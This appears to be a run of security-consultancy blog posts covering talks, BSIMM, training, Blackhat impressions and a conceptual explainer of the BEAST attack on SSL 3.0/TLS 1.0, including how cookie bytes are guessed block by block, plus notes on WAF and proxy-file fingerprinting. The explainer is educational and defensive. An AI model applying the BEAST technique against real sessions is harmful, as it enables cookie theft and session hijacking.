The good news from my perspective is that talks are up (clocking in at 40) even while trips are down (coming in at 27). Those are the kinds of trends I can live with.

I gave nine keynote talks this year to large audiences. They included:

• Software Security and the BSIMM, Fannie Mae CSO Security Summit (Washington, DC)
• Architecture Risk Analysis, RSA Innovation Sandbox (San Francisco, CA)
• How Do I Secure my Software?, Hotel Technology Next Generation (San Diego, CA)
• Software Security: State of the Practice, SAP Quality Day (Heidelberg, Germany)
• Software Security and the BSIMM, Software Experts Summit (Mountain View, CA)
• Software Security and the BSIMM, AERES (Vienna, Austria)
• Attack Trends 2012, SNI Security Summit (Knoxville, TN)
• Attack Trends 2012, Automated Control Systems Security (Washington, DC)
• The Building Security In Maturity Model, NESSOS, Internet Days EU (Poznan, Poland)

I also gave talks at thirteen universities, including Uva, Harvard, Umass, NCSU, Georgetown, the Naval Postgraduate School, JHU, UMd, Northern Kentucky University, Columbia, Indiana University, JMU, and UC Santa Barbara. It is always a blast to interact with students. They seem to get younger every year.

If you have a speaking opportunity for us, we would love to hear from you! Cigital has a bunch of very talented speakers.

My monthly column for informIT continues apace into its fifth year. Here is a listing of the last 12 articles in the series (still working on December’s). I think my favorite one is the Zombies paper…that one should live on for a while.

• Third-Party Software and Security (November 30, 2011)
• Software Security Training (October 31, 2011)
• BSIMM3 (September 27, 2011)
• Balancing All the Breaking with some Building (August 30, 2011)
• Software Security Zombies (July 21, 2011)
• Computer Security and International Norms (May 30, 2011)
• vBSIMM (BSIMM for Vendors) (April 12, 2011)
• Modern Malware (March 22, 2011)
• Software Patents and Fault Injection (February 28, 2011)
• Comparing Apples, Oranges, and Aardvarks (or, All Static Analysis Tools Are Not Created Equal) (January 31, 2011)
• Driving Efficiency and Effectiveness in Software Security (December 29, 2010)

My 2011 writing also included interaction with the Washington D.C. policy wonks at the Center for a New American Security. CNAS ran a study on cyber security for policymakers. CNAS CEO and Iraq War author Nate Fick co-authored a paper with me meant to inform lawmakers about what cyber security really should be: Separating the Threat from the Hype: What Washington Needs to Know About Cyber Security in AMERICA’S CYBER FUTURE: SECURITY AND PROSPERITY IN THE INFORMATION AGE VOLUMES I AND II, Center for a New Amercian Security [PDF] (June 2011).

With the purchase of Fortify Software by HP at the end of 2010, a long and very successful technology transfer path was completed. From our invention of security scanning in the labs at Cigital, through Kleiner-Perkins, to worldwide distribution through HP, code review for security is here to stay. I wrote the story up in IEEE Software: Technology Transfer: A Software Security Marketplace Case Study [PDF] (September/October 2011).

And there is always the Silver Bullet security podcast. The last 12 interviews included some really solid episodes. I think my favorite this year was an in depth interview with Ralph Langner about Stuxnet. Ralph is the guy who discovered that the payload was aimed at Siemens Control systems.

58. John Savage
59. Ralph Langner
60. Neil Daswani
61. Carl Landwehr
62. Halvar Flake
63. Craig Miller
64. Markus Schumacher
65. Giovanni Vigna
66. Shari Lawrence Pfleeger
67. Bill Pugh
68. John Steven

2012 should look much the same when it comes to trips and talks, though one of these years I need to find the time to write another book!

The UK intelligence agency, GCHQ, (roughly analogous to the US’s NSA) posted an online challenge recently at http://canyoucrackit.co.uk/ (read more). Given essentially no information other than what are pretty obviously hex digits, candidates are invited to attempt to “crack” an opaque puzzle. It isn’t even clear what the puzzle is (is it an encrypted document? is it a program? Is it a virus?).

Ostensibly the puzzle will help GCHQ identify very clever candidates to come work at the agency, fighting the good fight in cyberwarfare. Other high-profile companies have tried similar strategies in the past (like Google and Microsoft) to find highly qualified candidates.

The puzzle requires unraveling x86 instructions, finding a few bits of essential data hidden steganographically in the image itself, and putting it all together into a program that reveals a final URL to visit. The skills required to do this are similar to those required for reverse engineering unknown malware and trying to figure out what it does–especially when only part of it is present. It’s part systematic sleuthing, part guesswork, and part forensics.

As the UK, the US, and many other wealthy nations attempt to build their defences against cybercrime (and cyberwar), they are trying to identify good guys who have what it takes to understand what the bad guys do. It’s great fun to solve a problem like this, and it’s great fun to imagine doing that for a living to serve your country. But when you discover that the government’s salary is a fraction of the salary of being a private-sector good guy (not to mention what the bad guys might make), it’s no wonder they are struggling to find recruits.

The details of how I solved it are on my personal blog.

The BSIMM project describes and measures the work of 786 SSG members, who together with a satellite of 1750 people, have direct impact on the work of 185,316 developers. (Download a copy today and get your firm involved in the BSIMM Project.)

The BSIMM is mostly about SSDL activities and governance. However, third-party software plays a major role in all of the BSIMM firms and is an important risk factor that must be managed. In addition to talks from member firms, the BSIMM Community Conference also featured a workshop on third-party software and security.

Sammy, Brian, and I wrote up the results in an informIT article that was posted today.

The interesting aspect of our workshop was that it was made up approximately of 50% software vendors and 50% financial services firms. This made for a very interesting conversation around vendor control.

Here are those numbers again in the context of a few things we’ve learned:

Cigital has always included instructor-led training (ILT) as part of its knowledge transfer to clients. From our founding in 1992 through 2006, we trained an estimated 5000 students on various aspects of software quality and software security. This was done in only “a few hundred” sessions. In addition, from the launch of our formal training offerings in January 2007 through September 2011, we delivered approximately 525 ILT days to over 7700 students. Throw in “about 50” conference tutorial sessions and other non-client-specific training sessions (but not normal conference talks or similar things) and the student number grows to about 9000, for a total of about 14,000.

There has been some shift in demand over that time. For the first 10 years or so, everything was custom. We typically spent weeks and even months building training that was very specific to platforms, frameworks, coding standards, policies, and even specific problems-of-the-day. This training was usually for relatively small numbers of people all working on something very similar. For the firm, that becomes a very expensive proposition when you get to hundreds or even thousands of developers working in multiple technologies, stacks, languages, tools, and related items. There simply isn’t enough time or dollars to make custom training for everyone.

Starting in 2006, we saw a real market demand for more standardized software security training (as differentiated from the plethora of network security, tool-specific, and generic “security” training in the marketplace, or the deep-dive, single-topic courses for things like reversing malware or DLL hooking). This demand was and continues to be much more centered on foundational training for all SDLC stakeholders (business analysts, architects, developers, quality testers, pen testers, audit, risk/compliance, and so on) and advanced training for small groups (e.g., lead architects and developers).

From early 2007 through October 2011, Cigital also deployed eLearning to firms that represent over 100,000 students who are developers, architects, testers, managers, business analysts, security operations folks, and others. The majority of clients are using our eLearning in their internal learning management systems for access by employees as well as contractors integrated into the client’s ecosystem. For external contractors without access to internal client systems, clients are using our training portal.

There has been shift in the eLearning landscape as well.

• We see almost all large firms having their own learning management system and wanting to take our material in-house. Meanwhile, smaller firms are looking to out-source everything and simply purchase access to our LMS for a given number of seats.
• There is a growing demand for tightly-focused topical modules that can be consumed in an hour or less.
• There was an initial demand for custom eLearning and then off-the-shelf became all the rage as the economy changed.
• There’s a trend to moving training closer to the activity. For example, inserting some defensive programming training directly into the developer’s IDE. We’ve actually developed plug-in technology for this one.
• As everyone sees the possibilities represented by more advanced instructional design, there is an increasing demand for what can only be described as virtual reality and flying monkeys with every image and word indexed and a holographic interface that instantly takes the student to the exact second in the module that answers with cut-and-paste content whatever question the student is pondering. Oh, and it needs to run on any device from laptops to smart phones to microwaves and in-dash satellite radios. Of course, we’re all over this, too.

As an off-shoot of our continuing BSIMM activities, Gary and I also recently wrote an article on software security training. Here are some additional thoughts.

Cigital has been working one-on-one with Rural Electric Co-ops across the US to help them raise their cyber security bar, starting with the creation of their own custom cyber security plan. To facilitate this process, Cigital provided the Co-ops with several artifacts, including a Guide to Developing a Cyber Security and Risk Mitigation Plan and an associated Cyber Security Plan Template, developed by Cigital for the National Rural Electric Cooperative Association (NRECA). The following video captures testimonials from Rural Electric Co-ops that have worked with Cigital to create their cyber security plans, along with feedback from industry experts and practitioners on the cyber security risk management approach and toolkit developed by Cigital.

Since the first BSIMM interview in October 2008, we’ve progressed from nine to 30 to 42 firms (and more, at this point). We’ve also measured 11 firms twice—about 19 months between measurements on average—and that has provided the BSIMM community with some unique insight on how software security initiatives change over time. Assessing 42 individual firms and performing 11 re-assessments required 81 sets of interviews in just a shade less than three years.

For my money, that’s not bad for a backyard project.

Of the 42 firms in the data pool, 27 have graciously allowed us to name them as BSIMM participants. They are: Adobe, Aon, Bank of America, Capital One, The Depository Trust & Clearing Corporation (DTCC), EMC, Fannie Mae, Google, Intel, Intuit, McKesson, Microsoft, Nokia, QUALCOMM, Sallie Mae, SAP, Scripps Networks Interactive, Sony Ericsson, Standard Life, SWIFT, Symantec, Telecom Italia, Thomson Reuters, Visa, VMware, Wells Fargo, and Zynga. To these and the other 15 firms, thank you very much for participating. You are directly responsible for advancing the cause of software security.

The BSIMM3 document is freely available under a Creative Commons license. You can get it from http://bsimm.com. Go ahead; it’s a good read. Even if you’re down the road with your software security initiative, you can get a glimpse into the actual software security activities conducted by your peers and competitors. If you’ve yet to get started, BSIMM will give you some great ideas.

As always, we are looking for more people who are interested in participating in the BSIMM study. We’d love to hear from you.

–Sammy.

There has been a lot of talk about BEAST (Browser Exploit Against SSL/TLS) lately. The attack against SSL 3.0 / TLS 1.0 was recently publicized by Thai Duong and Juliano Rizzo. Do you know what the risks are, and how to protect yourself?

How does it work?

The attack has two components, and the goal is for the attacker to get your cookie so that he can hijack your session:

• Some client-side code (Java applet, Silverlight application, etc.) that is injected into a page delivered over HTTP that can make requests to a site that uses HTTPS. This may require bypassing (or finding loopholes in) same-origin security policies.
• A sniffer on the network that the victim is on, to record encrypted data generated by the client-side code. The sniffer and the client-side code need to communicate with each other for the attack to work.

The easiest way to carry out this attack is over a public Wi-Fi network; however, attackers on other types of networks including wired networks can also do this. The main requirement is that the attacker and the victim need to be on the same LAN. The attacker will need to conduct a man-in-the-middle attack to inject malicious code into a HTTP page that can make requests to the targeted HTTPS site. This attack only works if the HTTPS connection is established using SSL 3.0 or TLS 1.0 and a block cipher (e.g. 3DES or AES) in CBC mode is chosen. Unfortunately, most HTTPS sites currently support only SSL 3.0 and TLS 1.0, and prefer using block ciphers in CBC mode.

Some technical details

The main techniques used by the attack are described below. Feel free to skip this section if you don’t care about the technical details.

• Some types of client-side code (Java applets, Silverlight applications, etc.) have the ability to send partial HTTPS requests. They keep the SSL/TLS connection open, and send data as it becomes available. With SSL 3.0 / TLS 1.0, each time a new block of data is sent, a new random initialization vector is not generated. The data is simply appended to the previous stream. An attacker who sees the last ciphertext block and can control the next plaintext block can gain complete control over the next ciphertext block (this is a consequence of how CBC mode works).
• Since HTTP headers preceding cookie headers are predictable and can be obtained by an attacker who sniffs a single HTTP request from the victim, and since the attacker can control the URL of requests, he can control exactly where the cookie header’s bytes end up in relation to ciphertext block boundaries.
• If an attacker knows the previous block of ciphertext and can completely control the next block of plaintext, he can determine whether a previously seen block of ciphertext corresponded to a given block of plaintext. Let’s assume that the attacker wants to determine whether the plaintext, P_i, for a previously seen block of ciphertext, C_i was x. Now, the attacker knows C_j-1, the last block of ciphertext, and wants to set P_j, the next block of plaintext to be encrypted, to a value that helps him determine whether P_i was equal to x. If he sets P_j = C_j-1 ⊕ C_i-1P_i ⊕ x (note that C_j-1 and C_i-1 are sniffed from the network, and x is the attacker’s guess), and P_i was indeed equal to x, then C_j = E(C_j-1 ⊕ P_j) = E(C_j-1 ⊕ C_j-1 ⊕ C_i-1 ⊕ x) = E(C_i-1 ⊕ x) = E(C_i-1 ⊕ P_i) = C_i. Therefore, if the attacker’s guess is correct, then the next block of ciphertext, C_j, will equal the previously seen block of ciphertext, C_i.

Given the above details, let’s say that an attacker makes a request to /AAAAAAAAAA, and knows that it will result in a block of ciphertext containing part of the cookie header: “ookie: x” (this is realistic if a 3DES cipher suite is used). Now, the attacker can make all 256 possible guesses for x, and can determine the first byte of the cookie header. Next, the attacker can make a new HTTP request to /AAAAAAAAA (one less A, which shifts the cookie header one position to the left such that the ciphertext block is now “okie: xy”) and can guess y. The attacker can continue in this manner until he guesses all bytes of the cookie. In reality, there are a lot less than 256 possibilities for each byte of the cookie header, and so the attack requires less work. There are also several details required for the attack to work that are omitted here.

Why the problem can’t be fixed quickly

TLS 1.1, which fixes this issue, was defined in April 2006. As you may have guessed, this problem was known before April 2006. However, it was considered mostly a theoretical issue until Thai Duong and Juliano Rizzo showed how it can be used to decrypt cookies sent over HTTPS. Even though this issue has been known for a while, it is probably not going to be fixed anytime soon because most websites do not support TLS 1.1 or TLS 1.2. According to Opera, only about 0.25 percent of web servers support TLS 1.1, and only 0.02 percent of web servers support TLS 1.2. There are workarounds that some browser vendors are currently implementing and testing; however, this problem is not going to be completely fixed until most web servers start supporting TLS 1.1 or TLS 1.2.

Risks

Should you be worried? Probably not. This does not significantly increase the risk of connecting to untrusted networks. There are easier attacks that can be used to steal your cookies (or your username and password) for many websites, or even install arbitrary software on your computer if you connect to untrusted networks. Some examples are:

• Many websites do not set the ‘secure’ flag on their session cookies, which means that a tool like sslstrip can be used by an attacker on your network to get your cookie.
• Many websites provide login forms over HTTP (even though your password may actually submitted over HTTPS), and attackers on your network can modify the login pages to get your username and password.
• Many users ignore certificate warnings provided by browsers, or may not even notice that a tool like sslstrip is being used and that they are not actually accessing a site over HTTPS before entering their credentials.
• Tools such as Evilgrade can be used to install arbitrary software on your computer by leveraging software that has insecure automatic update mechanisms.

Protecting yourself

If you want to protect yourself against BEAST-like attacks, you can take several steps:

• Delete all your cookies before you connect to an untrusted network.
• Limit the amount of time you spend authenticated to HTTPS sites on untrusted networks, and remember to log out as soon as you are done.
• Until your browser vendor releases a fix, disable all cipher suites that use block ciphers in your browser (leave only cipher suites with RC4 enabled).

Note that the last workaround may cause you to be unable to access many websites. Of course, when browser vendors release security updates, install them immediately.

1. Integration with standard-fare open source and commercial middleware commonly used to deploy organizations’ web-apps (e.g. CA SiteMinder, MQ-Series, Documentum, etc.)
2. Greater predictability (and later maturity) in asset delivery road maps and schedule
3. Complete and user-centric documentation regarding adoption, implementation, and configuration
4. Progress against existing asset gaps deemed barriers to adoption by an organization

Jeff Williams and I collaborated on a Straw Man Partnership Model that describes ways for organizations to interact with OWASP.

As describe above here, the “buyer” (an organizational stakeholder) drives interaction. For this, I posit a buyer-driven work flow (see figure below)

(Buyer-driven workflow available: here )

Summarizing, the buyer coordinates with the OWASP project owner (either directly, or through a partner such as Cigital), determines things like: level of effort (LoE), division of responsibilities, and what will ultimately be shared. The producer then works with OWASP project team resources to hit scheduling and roadmap sign-posts.

If you’re interested in helping your organization with benefiting from open source projects, perhaps I can help there. If you’re interested in helping mature the projects themselves, I can definitely help–especially with OWASP ESAPI or cheat sheets. I’m also very interested in feedback on the whole partnership model. Please send mail.

My philosophy of software security and security in general has plenty of room for the art of the exploit. The icon that I have adopted to “brand” my work, the yin/yang with cowboy hats includes a black hat for a reason! Here’s what I said about the icon in the Preface of Software Security:

Fundamental material is covered under this icon (which also adorns the cover of the book). The Yin/Yang is the classic Eastern symbol describing the inextricable mixing of standard Western Polemics (black/white, good/evil, Heaven/Hell, create/destroy, et cetera). Eastern philosophies are described as holistic because they teach that reality combines polemics in such a way that one pole cannot be sundered from the other. In the case of software security, two distinct threads—black hat activities and white hat activities (offense/defense, construction/destruction)—intertwine to make up software security. A holistic approach, combining yin and yang (mixing black hat and white hat approaches) is what is required.

The White Hat + Black Hat approach informs three of my books and the entire Addison-Wesley Software Security Series:

Building Secure Software (BSS), the white hat book, seems to have touched off a revolution. Security people who once relied solely on firewalls, intrusion detection, and anti-virus mechanisms came to understand and embrace the necessity of better software. BSS provides a coherent and sensible philosophical foundation for the blossoming field of software security.

Exploiting Software (ES), the black hat book, provides a much needed balance, teaching about how to break software and how malicious hackers write exploits. ES is meant as a reality check for software security, ensuring that the good guys address real attacks and invent and peddle solutions that actually work. The two books are in some sense mirror images.

Software Security unifies the two sides of software security—attack and defense, exploiting and designing, breaking and building—into a coherent whole. Like the yin and the yang, software security requires a careful balance.

It may come as a surprise to you that I have never attended the famed Blackhat conference until this year. There are a couple of reasons for this, not the least of which my two time co-author Greg Hoglund has “covered” Blackhat most admirably for a decade. More generally, I guess my bias is definitely toward building systems properly and security engineering than it is towards penetration testing and throwing rocks at existing systems.

Blackhat and its sister con Defcon have always had reputations as “hackerboy” conferences populated by l33t “researchers” bent on breaking systems in spectacular fashion. I suppose Blackhat has over the years evolved into something more commercial, with a major shift in emphasis coming when it was purchased by UBM. Many of my associates in security have said that Blackhat attendance has shifted toward the corporate end of the spectrum and that it was looking more like the RSA Conference attendance-wise. As a consultant to large corporations taking software security seriously, this perceived shift is not to be ignored. That’s why I went to see for myself what’s up with Blackhat.

(I suppose I should throw in a quick aside here to point out that in my view being sentenced to spend time in Las Vegas is second only to the pain of spending time in Orlando. Just not my bag and a definite personal bias.)

Bottom line? Blackhat appears to be populated by plenty of security vendors mostly presenting to each other. I found a handful of Cigital customers at the show, but far more security practitioners who work for vendors than any other category of attendee. That probably makes Blackhat a reasonable show to attend if you’re interested in hiring pen testers and understanding something about the latest flavors of attacks. There were certainly some very superb people presenting at the show (Litchfield, Laurie, and Russinovich pop immediately to mind), but Blackhat seems to be more about after hours parties than security content—especially when it comes to engineering. That leaves me feeling conflicted about its value.

At this point in the life of software security as a field, I think we need to spend less time thinking about breaking systems and finding vulnerabilities than about fixing systems and mitigating vulnerabilities. (Not none, mind you, just less.) There were a couple of presentations and panels on the agenda that touched on software security basics, but a vast majority of the content is about (gleefully) breaking things. Incidentally, that’s why it was interesting to me that Microsoft announced its new security engineering Bluehat prize at the show. Seems like they might get better traction with that at Usenix Security, ISOC NDSS, or even RSA?!

There is certainly networking to be done at Blackhat, but nowhere near at the same scale or caliber as the networking at RSA (the security tradeshow that absolutely everybody attends). If you’re not up for late nights, loud dance music, bad well drinks, and club-based Vegas mayhem, Blackhat may not be your scene. Maybe I’m just getting old.

Information gathering is considered as one of the most critical step in performing aggressive penetration testing in all types of environment. With the proliferation of web vulnerabilities, the online world has introduced new protection mechanisms such as web applications firewalls. It is important to fingerprint these web application firewalls in order to conduct efficient and robust testing on websites and financial applications. Web Application Firewall (WAF) implements the concept of server cloaking, normalization with HTTP response header manipulation. It states that every WAF shows unique behavior which enables the testers to fingerprint the presence of that WAF in a production environment. The signatures are required to detect the presence of hidden devices in the network.

Proxy servers also play an important step in maintaining anonymity in the networks. Proxy servers are configured in a myriad of ways including static and dynamic configuration. Continuous testing has shown the fact that dynamic configuration in proxy servers using WPAD can indirectly harness the collective power of DHCP and DNS. The proxy file (proxy.wpad) is discovered using WPAD protocol. In addition to this, client browser also uses Proxy Auto Configuration (PAC) files which have specific “FindProxyForUrl” function that provide the connection string to the proxy server. It has been noticed that insecure access to these proxy configuration files can result in complete surrender of the entire internal network to the predators. However, fingerprinting proxy configuration files add to the taste of penetration testing.

The anonymous access to web services and protocols is a dangerous deal. It has been a major driver of differential attacks on anonymous services. However, it depends a lot on to what extent anonymous access can be exploited. For example: anonymous FTP access can be used to enumerate users, directories and initiating FTP bounce scans. These configuration flaws can be used in conjunction with web vulnerabilities to design a new attack vector. For example: – Cross Interface Attacks (CIA) in which FTP console is tested against buffer check which is further exploited to inject XSS/CSRF payloads to perform remote command execution. Design flaws in network devices can also be leveraged to extract plethora of information that can be useful in enhancing the modus operandi of penetration testing.

All these issues have been discussed in detailed at Source Conference. Please refer to the slides at: http://www.cigital.com/presentations/sourceseattle2011cigital_adityaks.pdf.